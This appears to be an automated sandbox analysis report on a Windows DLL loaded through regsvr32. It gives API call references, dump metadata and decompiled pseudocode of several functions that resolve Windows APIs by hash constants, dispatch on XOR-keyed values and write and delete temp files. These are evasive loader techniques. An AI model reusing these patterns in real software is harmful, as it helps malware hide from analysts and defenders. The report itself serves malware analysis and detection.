0x180006583
0x180006589
0x18000658e
0x180006593
0x180006598
0x1800065b2
0x1800065b9
0x1800065be
0x1800065c6
0x1800065e5
0x1800065f2
0x180006602
0x18000660f
0x180006614
0x180006623
0x18000662c
0x180006632
0x18000663c
0x18000664a
0x180006658
0x18000666b
0x180006679
0x18000669e

APIs

Sleep.KERNEL32(00000000,00000001800061B8), ref: 000000018000638C
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180006397

Part of subcall function 00000001800066A8: Sleep.KERNEL32 ref: 00000001800066D2
Part of subcall function 00000001800066A8: GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800066DD
Part of subcall function 00000001800066A8: HeapAlloc.KERNEL32 ref: 00000001800066F1

lstrlenA.KERNEL32 ref: 00000001800063E6
lstrlenA.KERNEL32 ref: 00000001800063F2
HeapAlloc.KERNEL32 ref: 0000000180006405
lstrcpyA.KERNEL32 ref: 000000018000641D
lstrcatA.KERNEL32 ref: 0000000180006444
lstrcatA.KERNEL32 ref: 0000000180006450
lstrlenA.KERNEL32 ref: 0000000180006482
HeapAlloc.KERNEL32 ref: 000000018000649B
_snprintf.NTDLL ref: 000000018000650F
HeapFree.KERNEL32 ref: 000000018000651E
HeapAlloc.KERNEL32 ref: 0000000180006577
_snprintf.NTDLL ref: 00000001800065E5
_snprintf.NTDLL ref: 0000000180006614
HeapFree.KERNEL32 ref: 000000018000662C
HeapFree.KERNEL32 ref: 000000018000663C
HeapFree.KERNEL32 ref: 000000018000664A
HeapFree.KERNEL32 ref: 0000000180006658
HeapFree.KERNEL32 ref: 000000018000666B
HeapFree.KERNEL32 ref: 0000000180006679

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
String ID:
API String ID: 4119021385-0
Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008D78 Relevance: 24.2, APIs: 16, Instructions: 249
memorystringtimeCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00000001180008D78(void* __ebx, void* __ecx, void* __edi, void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
				void* _t70;
				void* _t77;
				void* _t89;
				intOrPtr _t93;
				void* _t98;
				char _t99;
				void* _t118;
				long long* _t160;
				void* _t161;
				long long _t163;
				char* _t165;
				long long _t166;
				char* _t181;
				char* _t182;
				void* _t206;
				long long _t207;
				void* _t211;
				intOrPtr* _t212;
				int _t214;
				void* _t218;
				void* _t219;
				void* _t238;
				long _t241;
				long _t247;
				void* _t249;
				CHAR* _t256;
				long long _t257;

				_t238 = _t218;
				 *((long long*)(_t238 + 8)) = __rbx;
				 *((long long*)(_t238 + 0x10)) = __rdx;
				_t219 = _t218 - 0x40;
				r13d =  *0x8000d498;
				_t212 = __rcx;
				 *((long long*)(_t219 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
				if (E00000001180002370(__rdx, __rdx, _t238) != 0) goto 0x800090ee;
				_t207 =  *((intOrPtr*)( *0x8000d4a0 + 8));
				_t160 =  *_t212;
				 *((long long*)(_t219 + 0x98)) = _t160;
				 *((long long*)(_t219 + 0x28)) = _t207;
				if ( *((intOrPtr*)(_t219 + 0x20)) == 0) goto 0x80008f65;
				r8d = lstrlenA(_t256) + 1;
				HeapAlloc(_t249, _t247, _t241);
				_t257 = _t160;
				if (_t160 == 0) goto 0x800090e4;
				memcpy(_t206, _t211, _t214);
				_t165 = _t257;
				if ( *_t165 == 0x20) goto 0x80008e46;
				if ( *_t165 != 9) goto 0x80008e4b;
				_t166 = _t165 + 1;
				goto 0x80008e3c;
				if ( *_t166 == 0) goto 0x80008ecc;
				lstrlenA(??);
				asm("cdq");
				_t12 = _t160 + 1; // 0x1
				r8d = _t12;
				_t70 = HeapAlloc(??, ??, ??);
				if (_t160 == 0) goto 0x80008ece;
				_t98 =  *_t166;
				if (_t98 == 0) goto 0x80008e99;
				if (_t98 == 0x20) goto 0x80008e95;
				_t181 = _t166 + 1;
				_t99 =  *_t181;
				if (_t99 != 0) goto 0x80008e87;
				if (_t99 != 0) goto 0x80008e9b;
				if (_t181 == 0) goto 0x80008eb5;
				 *_t181 = 0;
				_t182 = _t181 + 1;
				if ( *_t182 == 0x20) goto 0x80008eb0;
				if ( *_t182 != 9) goto 0x80008eb5;
				goto 0x80008ea6;
				 *_t160 = _t166;
				_t161 = _t160 + _t207;
				if (_t182 + 1 != 0) goto 0x80008e7e;
				goto 0x80008ed6;
				if (0 == 0) goto 0x80008f4f;
				E0000000118000958C(_t70,  *((intOrPtr*)(_t219 + 0x98)) + 0x18);
				 *((long long*)(_t212 + 0x40)) = _t257;
				 *((long long*)(_t212 + 0x48)) =  *((intOrPtr*)(_t219 + 0x90));
				 *((intOrPtr*)(_t212 + 0x50)) = bpl;
				if ( *((char*)(_t212 + 0x70)) == 0) goto 0x80008f09;
				 *((char*)(_t212 + 0x70)) = 0;
				asm("lock and dword [esi+0x2c], 0xfffffffe");
				LeaveCriticalSection(??);
				if ( *((intOrPtr*)(_t212 + 0x40)) == 0) goto 0x80008f3e;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80008f6a;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				if (0x57 != 0) goto 0x800090f3;
				if (E00000001180002370( *((intOrPtr*)(_t219 + 0x88)),  *((intOrPtr*)(_t219 + 0x20)), _t238) != 0) goto 0x800090ee;
				_t77 = E000000011800038F8(_t76, 0,  *((intOrPtr*)(_t219 + 0x20)), _t219 + 0x98);
				_t93 =  *((intOrPtr*)(_t219 + 0x98));
				if (_t77 != 0) goto 0x80008fd2;
				if (_t93 == 0) goto 0x800090ee;
				 *((intOrPtr*)(_t212 + 0x28)) = _t93;
				if (E00000001180002370( *((intOrPtr*)(_t219 + 0x88)),  *((intOrPtr*)(_t219 + 0x20)), _t238) != 0) goto 0x8000905e;
				_t39 = _t161 + 0x10; // 0x10
				_t89 = _t39;
				_t118 =  <  ?  *((void*)(_t219 + 0x90)) : _t89;
				E0000000118000958C(_t78,  *_t212 + 0x18);
				r8d = _t118;
				memcpy(??, ??, ??);
				if (_t118 - _t89 >= 0) goto 0x80009043;
				r8d = _t89 - _t118;
				memset(??, ??, ??);
				LeaveCriticalSection(??);
				HeapFree(??, ??, ??);
				r13d = r13d ^ 0x1a1a0866;
				if (E00000001180002370( *((intOrPtr*)(_t219 + 0x88)),  *((intOrPtr*)(_t219 + 0x20)), _t238) != 0) goto 0x800090f3;
				if (E000000011800038F8(_t83, 0,  *((intOrPtr*)(_t219 + 0x20)), _t219 + 0x98) == 0) goto 0x800090f3;
				if ( *((intOrPtr*)(_t219 + 0x98)) == 0) goto 0x800090f3;
				_t55 =  *_t212 + 0x18; // 0x28
				E0000000118000958C(_t84, _t55);
				GetSystemTimeAsFileTime(??);
				_t163 =  *((intOrPtr*)(_t219 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
				 *((long long*)(_t219 + 0x30)) = _t163;
				 *((long long*)(_t212 + 0x30)) = _t163;
				LeaveCriticalSection(??);
				goto 0x800090f3;
				goto 0x80008f6a;
				return 1;
			}

APIs

lstrlenA.KERNEL32(?,?,?,?,000000B0,00000008,?,0000000180002348), ref: 0000000180008DFC
HeapAlloc.KERNEL32 ref: 0000000180008E0E
memcpy.NTDLL ref: 0000000180008E29
lstrlenA.KERNEL32 ref: 0000000180008E53
HeapAlloc.KERNEL32 ref: 0000000180008E6B
LeaveCriticalSection.KERNEL32 ref: 0000000180008F12
HeapFree.KERNEL32 ref: 0000000180008F2A
HeapFree.KERNEL32 ref: 0000000180008F38
HeapFree.KERNEL32 ref: 0000000180008F57
HeapFree.KERNEL32(?,?,?,?,000000B0,00000008,?,0000000180002348), ref: 0000000180008F77
memcpy.NTDLL ref: 0000000180009026
memset.NTDLL ref: 000000018000903E
LeaveCriticalSection.KERNEL32 ref: 0000000180009048
HeapFree.KERNEL32 ref: 0000000180009058
GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800090B7
LeaveCriticalSection.KERNEL32 ref: 00000001800090DC

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
String ID:
API String ID: 3273538229-0
Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001844 Relevance: 19.7, APIs: 13, Instructions: 167
memoryfilestringCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 19%

			E00000001180001844(void* __eax, void* __ebx, void* __ecx, void* __edx, long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
				signed long long _v72;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t28;
				int _t35;
				void* _t37;
				int _t56;
				int _t65;
				void* _t70;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr* _t97;
				signed long long _t98;
				intOrPtr* _t111;
				void* _t123;
				void* _t126;
				intOrPtr* _t127;
				intOrPtr* _t128;
				void* _t130;
				signed long long _t137;
				void* _t145;
				void* _t150;

				_t99 = __rbx;
				_a8 = __rbx;
				_t97 =  *0x8000d4a0;
				r12d = 0;
				_t150 = __rcx;
				if (__rdx == _t145) goto 0x80001a6f;
				if ( *__rdx == r12b) goto 0x80001a6f;
				E00000001180007B04(__rbx, __rdx, _t123, _t126, _t130, __rdx);
				if (_t97 == _t145) goto 0x80001a6a;
				_t98 =  *0x8000d4a0;
				_t28 = GetTempPathW(??, ??);
				if (_t28 == r12d) goto 0x80001a55;
				HeapAlloc(??, ??, ??);
				if (_t98 == _t145) goto 0x80001a55;
				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
				GetSystemTimeAsFileTime(??);
				r8d = GetCurrentThreadId() ^ _a32;
				if (GetTempFileNameW(??, ??, ??, ??) != r12d) goto 0x80001927;
				_t137 = _t98;
				HeapFree(??, ??, ??);
				if (_t145 == _t145) goto 0x80001a55;
				_t127 = _t97;
				__imp__StrChrW();
				r8d = 0;
				if (_t98 == _t137) goto 0x80001964;
				_a16 = _t28;
				goto 0x80001976;
				_t111 = _t127;
				_t35 = lstrlenW(??);
				r8d = 0;
				_a16 = _t35;
				if (_t35 == r8d) goto 0x800019a7;
				_t11 = _t111 - 1; // -1
				_t65 = _t11;
				_t73 =  *((intOrPtr*)(_t127 + _t98 * 2));
				if (_t73 == 0x20) goto 0x8000198e;
				if (_t73 != 9) goto 0x80001999;
				_t56 = _t65;
				_a16 = _t65;
				if (_t65 != r8d) goto 0x8000197b;
				if (_t56 == r8d) goto 0x800019a7;
				_t74 =  *_t127;
				if (_t74 == 0x20) goto 0x800019ad;
				if (_t74 != 9) goto 0x800019b9;
				_t128 = _t127 + 2;
				_a16 = _t56 - 1;
				goto 0x80001999;
				 *((intOrPtr*)(_t128 + _t98 * 2)) = r8w;
				if ( *_t128 == r8w) goto 0x800019ef;
				_v72 = _t137;
				r9d = 0;
				_t37 = E00000001180009B7C(0x57, _t99, _t150, _t128, _t145, _t128,  *((intOrPtr*)(_t98 + 8)), _t145);
				if (_t37 != 0) goto 0x80001a3c;
				if (_t98 + 2 == 0) goto 0x800019f4;
				goto 0x80001938;
				if (_t37 != r8d) goto 0x80001a3c;
				if (E00000001180003698(_t56 - 1, _t37 - r8d, _t99, _t145,  &_a24,  *((intOrPtr*)(_t98 + 8)),  &_a16, _t98) != 0) goto 0x80001a3c;
				r9d = _a16;
				E00000001180005BDC(_t56 - 1, _t70, _t99, _t150, _t98 + 2,  *((intOrPtr*)(_t98 + 8)), _a24);
				HeapFree(??, ??, ??);
				DeleteFileW(??);
				HeapFree(??, ??, ??);
				goto 0x80001a5a;
				HeapFree(??, ??, ??);
				goto 0x80001a6f;
				return 8;
			}

APIs

Part of subcall function 0000000180007B04: lstrlenA.KERNEL32 ref: 0000000180007B2B
Part of subcall function 0000000180007B04: HeapAlloc.KERNEL32 ref: 0000000180007B46
Part of subcall function 0000000180007B04: memset.NTDLL ref: 0000000180007B71

GetTempPathW.KERNEL32 ref: 00000001800018A8
HeapAlloc.KERNEL32 ref: 00000001800018C3
GetTempPathW.KERNEL32 ref: 00000001800018DA
GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800018ED
GetCurrentThreadId.KERNEL32 ref: 00000001800018F3
GetTempFileNameW.KERNEL32 ref: 000000018000190B
HeapFree.KERNEL32 ref: 000000018000191E
StrChrW.SHLWAPI ref: 0000000180001940
lstrlenW.KERNEL32 ref: 0000000180001967
HeapFree.KERNEL32 ref: 0000000180001A36
DeleteFileW.KERNEL32 ref: 0000000180001A3F
HeapFree.KERNEL32 ref: 0000000180001A4D
HeapFree.KERNEL32 ref: 0000000180001A62

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
String ID:
API String ID: 2968359827-0
Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005748 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184
memorysynchronizationCOMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E00000001180005748(void* __ebx, void* __ecx, void* __edi, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				signed int _t35;
				void* _t70;
				signed int _t72;
				void* _t82;
				char* _t115;
				signed long long _t118;
				char* _t126;
				void* _t144;
				void* _t147;
				char* _t149;
				signed long long _t152;
				void* _t154;
				void* _t155;
				void* _t171;
				void* _t172;
				void* _t174;
				void* _t177;

				_t118 = __rbx;
				 *((long long*)(_t154 + 8)) = __rbx;
				 *(_t154 + 0x18) = _t152;
				_t155 = _t154 - 0x40;
				_t115 =  *0x8000d4a0;
				r15d =  *0x8000d498;
				_t35 = r15d ^ _t72;
				_t148 = __r8;
				_t172 = __rcx;
				_t4 = _t152 + 1; // 0x1
				_t82 = _t4;
				if (_t35 == 0x139d2b8d) goto 0x8000588d;
				if (_t35 == 0x15f5a8c2) goto 0x80005865;
				if (_t35 == 0x2f77acf9) goto 0x8000588b;
				if (_t35 == 0x31f2972e) goto 0x80005861;
				if (_t35 == 0x48e12436) goto 0x80005965;
				if (_t35 == 0x4d382929) goto 0x80005905;
				if (_t35 == 0x7f513d6b) goto 0x80005863;
				if (_t35 == 0xb016dc39) goto 0x80005852;
				if (_t35 == 0xb057dfc9) goto 0x800057e4;
				goto 0x800059bb;
				if (r9d == 0) goto 0x80005848;
				E000000011800024CC(__rbx, __r8, __rdx, __r8, _t177);
				if (_t115 == 0) goto 0x8000583e;
				 *(_t155 + 0x20) =  *(_t155 + 0x20) & _t118;
				if (E00000001180002668(_t82, __ecx, _t115, _t118, _t172, 0x180001844, _t148, _t152, _t115,  *((intOrPtr*)(_t155 + 0x90)), _t174, _t171) != 0) goto 0x8000582b;
				goto 0x800059bb;
				HeapFree(??, ??, ??);
				goto 0x800059bb;
				goto 0x800059bb;
				goto 0x800059bb;
				SetEvent(_t144);
				goto 0x800059bb;
				if (r9d == 0) goto 0x80005848;
				_t126 = _t115;
				E000000011800024CC(_t118, _t126, 0x180001844, _t148, _t147);
				_t149 = _t115;
				if (_t115 == 0) goto 0x8000583e;
				if (_t82 + _t82 != 2) goto 0x800058ae;
				goto 0x800058c2;
				if ( *((intOrPtr*)(_t126 + 0x50)) == 0) goto 0x800058ec;
				WaitForSingleObject(??, ??);
				asm("sbb ebx, ebx");
				goto 0x800058f1;
				_t141 =  ==  ? 0x18000543c : 0x180001b7c;
				 *(_t155 + 0x20) =  *(_t155 + 0x20) & _t152;
				if (E00000001180002668(_t82 + _t82 + 0x4ce, __ecx, 0x18000543c, _t118, _t172,  ==  ? 0x18000543c : 0x180001b7c, _t149, _t152, _t149,  *((intOrPtr*)(_t155 + 0x90))) == 0) goto 0x80005821;
				goto 0x8000582e;
				if (_t82 == 0) goto 0x800059bb;
				if (0x426 != 0x426) goto 0x800059bb;
				if (_t149 == 0) goto 0x8000595f;
				if ( *_t149 == 0) goto 0x8000595f;
				memset(??, ??, ??);
				if (E000000011800020DC(_t82, 0x18000543c, _t118, _t149, _t155 + 0x30, _t149) != 0) goto 0x8000595d;
				if (E000000011800038F8(_t46, 0, _t149, _t155 + 0x78) == 0) goto 0x8000595f;
				asm("ror ax, 0x8");
				 *((short*)(_t155 + 0x32)) =  *(_t155 + 0x78) & 0x0000ffff;
				if (0 != 0) goto 0x800059bb;
				if ( *(_t172 + 0x50) == 0) goto 0x8000599a;
				 *(_t172 + 0x50) =  *(_t172 + 0x50) & 0x00000000;
				E00000001180007950( *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t172 + 0x50), _t155 + 0x30, _t115,  *(_t172 + 0x50), _t152);
				HeapFree(??, ??, ??);
				goto 0x8000599f;
				if (_t82 == 0) goto 0x800059bb;
				_t70 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t155 + 0x30, _t115,  *(_t172 + 0x50), _t152,  *((intOrPtr*)(_t172 + 0x38)), _t172 + 0x50);
				if ( *((long long*)(_t155 + 0x90)) == 0) goto 0x800059e1;
				if (_t70 == 0x3e5) goto 0x800059e1;
				r8d = _t70;
				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t172,  *((intOrPtr*)(_t155 + 0x90)), _t152);
				return _t70;
			}

APIs

HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990

Strings

lJu, xrefs: 0000000180005914
))8M, xrefs: 00000001800057B9
6$H, xrefs: 00000001800057AE

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: FreeHeap$EventObjectSingleWaitmemset
String ID: ))8M$6$H$lJu
API String ID: 2222956709-2816507560
Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004A14 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 45%

			E00000001180004A14(void* __ecx, void* __ebp, void* __eflags, long long* __rax, long long __rbx, void* __rdx, long long __rsi) {
				void* _t47;
				intOrPtr _t58;
				void* _t62;
				long _t68;
				void* _t75;
				void* _t94;
				void* _t95;
				intOrPtr _t99;
				void* _t100;
				long long* _t119;
				long long* _t120;
				void* _t146;
				long long _t151;
				void* _t153;
				void* _t154;
				void* _t161;
				int _t165;
				int _t169;
				void* _t171;

				_t119 = __rax;
				 *((long long*)(_t153 + 8)) = __rbx;
				 *((long long*)(_t153 + 0x10)) = _t151;
				 *((long long*)(_t153 + 0x18)) = __rsi;
				_t154 = _t153 - 0x80;
				_t147 =  *0x8000d4a0;
				r14d = __ecx;
				_t99 = r8d;
				E0000000118000459C(_t47, 0x4e1c2e77,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t119 == 0) goto 0x80004a75;
				r9d = 0x18;
				r8d = 0;
				 *((intOrPtr*)(_t154 + 0x20)) = 0xf0000040;
				 *_t119();
				goto 0x80004a77;
				if (0 == 0) goto 0x80004c20;
				r8d =  *((intOrPtr*)(_t154 + 0xe0));
				_t10 = _t154 + 0x48; // -190
				if (E00000001180006D04(_t75, _t94, _t95, __rbx,  *((intOrPtr*)(_t154 + 0x50)), __rsi, _t10) != 0) goto 0x80004c02;
				_t11 = _t119 + 0x10; // 0x10
				r15d = _t11;
				E0000000118000459C(memset(_t171, _t169, _t165), 0xd74cfe41,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t119 == 0) goto 0x80004ae3;
				r9d = 0;
				 *_t119();
				goto 0x80004ae5;
				if (0 != 0) goto 0x80004af9;
				if (GetLastError() != 0) goto 0x80004c02;
				_t58 =  >  ? r15d : _t99;
				r8d = _t58;
				 *((intOrPtr*)(_t154 + 0x40)) = _t58;
				memcpy(_t161, _t146);
				_t100 = _t99 -  *((intOrPtr*)(_t154 + 0x40));
				if (r14d == 0) goto 0x80004b70;
				E0000000118000459C( *((intOrPtr*)(_t154 + 0x40)), 0x4217c141,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t119 == 0) goto 0x80004baa;
				r8d = 0;
				_t23 = _t154 + 0x40; // -198
				 *((intOrPtr*)(_t154 + 0x30)) = 0x20;
				 *((long long*)(_t154 + 0x28)) = _t23;
				_t26 = _t154 + 0x58; // -174
				r8b = _t100 == 0;
				 *((long long*)(_t154 + 0x20)) = _t26;
				r9d = 0;
				_t62 =  *_t119();
				goto 0x80004bac;
				E0000000118000459C(_t62, 0x8ea73a36,  *((intOrPtr*)(_t154 + 0x48)));
				if (_t119 == 0) goto 0x80004baa;
				r8d = 0;
				_t29 = _t154 + 0x40; // -198
				 *((long long*)(_t154 + 0x28)) = _t29;
				r8b = _t100 == 0;
				_t31 = _t154 + 0x58; // -174
				 *((long long*)(_t154 + 0x20)) = _t31;
				r9d = 0;
				 *_t119();
				goto 0x80004bac;
				if (0 == 0) goto 0x80004bd6;
				r8d =  *((intOrPtr*)(_t154 + 0x40));
				memcpy(??, ??, ??);
				if (_t100 == 0) goto 0x80004bde;
				goto 0x80004afd;
				_t68 = GetLastError();
				_t120 =  *((intOrPtr*)(_t154 + 0xd0));
				 *_t120 = 0 +  *((intOrPtr*)(_t154 + 0x40));
				E0000000118000459C(_t68, 0xff709000,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t120 == 0) goto 0x80004c02;
				E0000000118000459C( *_t120(), 0xbaca8f4d,  *((intOrPtr*)(_t147 + 0x20)));
				if (_t120 == 0) goto 0x80004c28;
				 *_t120();
				goto 0x80004c28;
				return GetLastError();
			}

0x180004a14
0x180004a14
0x180004a19
0x180004a1e
0x180004a2c
0x180004a33
0x180004a3a
0x180004a4c
0x180004a4f
0x180004a57
0x180004a5e
0x180004a64
0x180004a69
0x180004a71
0x180004a73
0x180004a79
0x180004a7f
0x180004a94
0x180004aa2
0x180004aa8
0x180004aa8
0x180004ac5
0x180004acd
0x180004adc
0x180004adf
0x180004ae1
0x180004ae7
0x180004af3
0x180004b07
0x180004b0e
0x180004b11
0x180004b15
0x180004b1e
0x180004b2c
0x180004b33
0x180004b3b
0x180004b3d
0x180004b40
0x180004b45
0x180004b4d
0x180004b52
0x180004b59
0x180004b5d
0x180004b67
0x180004b6c
0x180004b6e
0x180004b75
0x180004b7d
0x180004b7f
0x180004b82
0x180004b89
0x180004b8e
0x180004b92
0x180004b97
0x180004ba1
0x180004ba6
0x180004ba8
0x180004bae
0x180004bb0
0x180004bbd
0x180004bcf
0x180004bd1
0x180004bd6
0x180004bde
0x180004beb
0x180004bf1
0x180004bf9
0x180004c0b
0x180004c13
0x180004c1c
0x180004c1e
0x180004c4a

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20

Strings

, xrefs: 0000000180004B45
@, xrefs: 0000000180004A69

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorLast$memcpy$memset
String ID: $@
API String ID: 1408984137-1077428164
Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003A24 Relevance: 10.6, APIs: 7, Instructions: 137
synchronizationthreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 29%

			E00000001180003A24(void* __ecx, long long __rbx, long long __rcx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				void* _t39;
				void* _t41;
				long _t49;
				void* _t50;
				void* _t72;
				void* _t75;
				signed long long _t95;
				signed long long _t96;
				void* _t98;
				void* _t110;
				int _t113;
				void* _t114;
				signed long long _t119;
				void* _t121;
				long long* _t127;
				void* _t129;
				signed long long _t130;
				void* _t132;

				 *((long long*)(_t121 + 8)) = __rbx;
				 *(_t121 + 0x10) = _t119;
				 *((long long*)(_t121 + 0x18)) = __rsi;
				_t117 =  *0x8000d4a0;
				_t114 = __r9;
				_t98 = __rcx;
				if (__r9 != 0) goto 0x80003a5b;
				goto 0x80003be2;
				r8d = 0x10;
				memcpy(_t132, _t129, _t113);
				InitializeCriticalSection(??);
				_t6 = _t98 + 0x88; // 0x88
				_t127 = _t6;
